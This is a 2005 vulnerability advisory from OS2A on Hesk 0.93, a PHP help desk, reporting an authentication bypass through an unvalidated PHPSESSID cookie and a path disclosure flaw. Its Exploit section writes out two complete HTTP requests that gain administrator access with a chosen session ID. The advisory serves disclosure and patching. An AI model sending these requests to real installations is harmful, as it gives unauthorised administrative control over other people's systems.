OS2A

Hesk Session ID Validation Vulnerability


OS2A ID: OS2A_1003        Status
            9/13/2005 Issue Discovered
            9/14/2005 Reported to the vendor
            9/18/2005 Patch Released
            9/20/2005 Advisory Released
              

Class: Authentication Bypass      Severity: CRITICAL


Overview:
Hesk is a PHP based help desk software that runs with a MySQL database. 
It allows to setup a ticket based support system (helpdesk) for websites.
Hesk versions 0.93 and prior are vulnerable to authentication bypass and path 
disclosure vulnerabilities caused due to improper validation of the HTTP 
header. This vulnerability can be exploited to bypass authentication 
mechanism, and also made to reveal system specific information. 
 

Description:
Multiple vulnerabilities exist in Hesk ticket based support system.

1. Authentication Bypass
   The 'PHPSESSID', Session ID parameter in the HTTP header is not properly 
   validated. A malicious user can log in to the Administrator account by 
   sending a random value to 'PHPSESSID' parameter and posting it to 
   admin.php. This Session ID can then be utilized to access administrative 
   control panel. 
 
   This is similar to a previously reported vulnerability where invalid 
   User ID and Password were submitted. In this case, a randomly chosen 
   Session ID is sent along with the login request. 
   
2. Path Disclosure.
   Path information can be made to disclose in error pages by passing invalid 
   metacharacters such as "'" or "<" to 'PHPSESSID' field of the HTTP header.
   

Impact:
Successful exploitation can result in a compromise of the application, 
disclosure of system specific information.

Affected Systems:
Hesk 0.93 and prior.
Linux (Any), Unix (Any), Windows (Any)

Exploit:
1. HTTP POST request with randomly chosen Session ID:
POST admin.php +
("Host: host_ip
  User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.7) 
  Accept: text/xml,application/xml,application/xhtml+xml,text/html
  Accept-Language: en-us,en;q=0.5
  Accept-Encoding: gzip,deflate
  Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
  Keep-Alive: 300
  Connection: keep-alive
  Referer: http://host_ip/hesk/admin.php
  Cookie: PHPSESSID=12345                             <!-- Random Session ID --!>
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 26
  user=1&pass=sdfd&a=do_login");
 
2. GET request to administrative control panel:
GET admin_main.php +
("Host: host_ip
  User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.7) 
  Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain
  Accept-Language: en-us,en;q=0.5
  Accept-Encoding: gzip,deflate
  Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
  Keep-Alive: 300
  Connection: keep-alive
  Cookie: PHPSESSID=12345")                            <!-- Session ID --!>

Solutions:
  Patch: 
  http://www.phpjunkyard.com/extras/hesk_0931_patch.zip
  OR Hesk 0.93.1 from
  http://www.phpjunkyard.com/free-helpdesk-software.php

Credits:
Rajesh Sethumadhavan, Rahul Mohandas, and Jayesh K.S of OS2A have discovered 
the vulnerability